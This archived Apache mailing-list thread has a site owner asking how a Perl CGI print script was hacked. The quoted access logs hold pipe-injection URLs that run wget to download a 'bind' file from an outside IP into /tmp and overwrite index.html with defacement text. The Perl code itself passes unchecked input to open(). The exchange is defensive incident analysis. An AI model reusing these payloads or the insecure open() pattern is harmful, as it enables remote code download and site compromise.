httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Murthy Ambaru <bobby...@yahoo.com>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 21:08:21 GMT
Thanks for the explanation.So the file can be downloaded to /tmp/bind directory in the server
executing that script. As i said, i tried typing in the URL used and got nothing. I did not
check the /tmp/bind though(I did not find that in the interface that i use to manage files
on server). So what would be an secure way of opening the file? 
The script is in PERL. I am adding it below. Can you see anything weird in it?? Thanks...
 
#!/usr/local/bin/perl
print "Content-type: text/html\n\n";
&parseForm;
open(HEADER,"printheader.html") ;
my @HEADER = <HEADER>;
close(HEADER);
#print it! Put a # before print if you don't want a header printed...
print "@HEADER";
my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}
my @FILE = <FILE>;
close(FILE);
$print = 1 ;
foreach $line(@FILE) {
        if ($line =~ /beginimage/) {
                print $line ;
                $print = 0;
                next ;
        }
        if ($line =~ /endimage/) { $print = 1 ; }
        if ($print eq "1") {
                print $line;
        }
}

########################################################
sub parseForm {
    if ($ENV{'REQUEST_METHOD'} eq 'GET') {
        # Split the name-value pairs
        @pairs = split(/&/, $ENV{'QUERY_STRING'});
    }
elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {

 read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
   # Split the name-value pairs
   @pairs = split(/&/, $buffer);
}
   foreach $pair (@pairs) {
      ($name, $value) = split(/=/, $pair);
      # Un-Webify plus signs and %-encoding
      $value =~ tr/+/ /;
      $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
      $FORM{$name} = $value;
      }
}


"Ivan Barrera A." <Bruce@Ivn.cl> wrote:
I mean, the cgi script (which i dont know anything about) seems to "open 
" a file reffered by ?file= ... Probably an insecure way of "opening" 
the file, leads to execute the rest of the statement.

Look :

?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind

After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind 
is appended. So , if the script execute this, the command wget will 
exec, and download that file into /tmp/bind.
After that, using the same technique, you can exec anything you want. so 
the problem is the way of opening (or doing something else) to the files 
in the cgi script.
is it a c , perl , php , or any other language script ?

Murthy Ambaru wrote:
> Thanks for the response Ivan. I am sorry i realy did not understand what 
> you mean by "download the file to /tmp/bind". when the printer friendly 
> link is clicked, this is the URL that will be accessed:
> http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> ofcourse it depends on the page being clicked at. So the file name will 
> be passed as parameter to the CGI file. I included the CGI code in my 
> earlier mail, could you please take a look.
> Thanks,
> Murthy
> 
> */"Ivan Barrera A." 
/* wrote:
> 
> the url you entered, download the file bind to /tmp/bind . It's
> probably
> an irc bot or a backdoor.
> If someone did that, the version of the cgi script, is unsecure, and
> should be revised.
> 
> Im sorry if i didnt clarify enough, but would be useful to see that cgi.
> 
> Murthy Ambaru wrote:
> > I have a question regarding security. There is a web site that
> has an
> > printer friendly version of web pages being dsiplayed using a CGI
> > script. Apparently when this was in use, the site was hacked and
> some
> > unwanted stuff posted on the site. I had a look at the access.log
> when
> > this occurred and this was what showed up(I just replaced the
> site name
> > with xyz, everything else is same):
> >
> >
> > /images/newswireprint.gif HTTP/1.0" 304 -
> >
> > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> >
> > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> >
> >
> > GET
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > hosts/xyz.org/httpdocs/index.html|
> >
> > Can anyone understand how are they able to hack? I tried
> reproducing it
> > by typing in the above URL used by hackers, but could get nothing
> out of
> > it. The permissions on all the html docs folders are set to 755.
> >
> > Below is the CGI file being used. It basically strips images off.
> Can
> > anyone help with this problem? what should i be looking at to
> plug off
> > the security holes....Thanks a lot
> >
> > -Murthy
> >
> >
> >
> > #!/usr/local/bin/perl
> >
> > print "Content-type: text/html\n\n";
> >
> > &parseForm;
> >
> > open(HEADER,"printheader.html") ;
> > my @HEADER = ;
> > close(HEADER);
> > #print it! Put a # before print if you don't want a header printed...
> > print "@HEADER";
> >
> > my $data_file =
> > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> >
> > if (!open(FILE,"$data_file")) { die "Can't open";}
> > my @FILE = ;
> > close(FILE);
> >
> > $print = 1 ;
> >
> > foreach $line(@FILE) {
> >
> > if ($line =~ /beginimage/) {
> > print $line ;
> > $print = 0;
> > next ;
> > }
> >
> > if ($line =~ /endimage/) { $print = 1 ; }
> >
> > if ($print eq "1") {
> > print $line;
> > }
> >
> > }
> >
> >
> > ########################################################
> >
> > sub parseForm {
> >
> > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > # Split the name-value pairs
> > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > }
> > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> >
> >
> > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> >
> > # Split the name-value pairs
> > @pairs = split(/&/, $buffer);
> > }
> > foreach $pair (@pairs) {
> > ($name, $value) = split(/=/, $pair);
> >
> > # Un-Webify plus signs and %-encoding
> > $value =~ tr/+/ /;
> > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> >
> > $FORM{$name} = $value;
> > }
> >
> > }
> >
> >
> >
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > Meet the all-new My Yahoo!  Try it today!
> 
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
> 
> ------------------------------------------------------------------------
> Do you Yahoo!?
> The all-new My Yahoo!  What will yours do?

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


		
---------------------------------
Do you Yahoo!?
 Yahoo! Mail - 250MB free storage. Do more. Manage less.
Mime
View raw message